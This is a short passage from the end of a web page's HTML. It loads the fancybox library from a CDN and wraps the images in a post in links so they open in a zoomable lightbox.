      this.onclick = null
    }
  </script>



  <script src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js"></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>












</body>
</html>
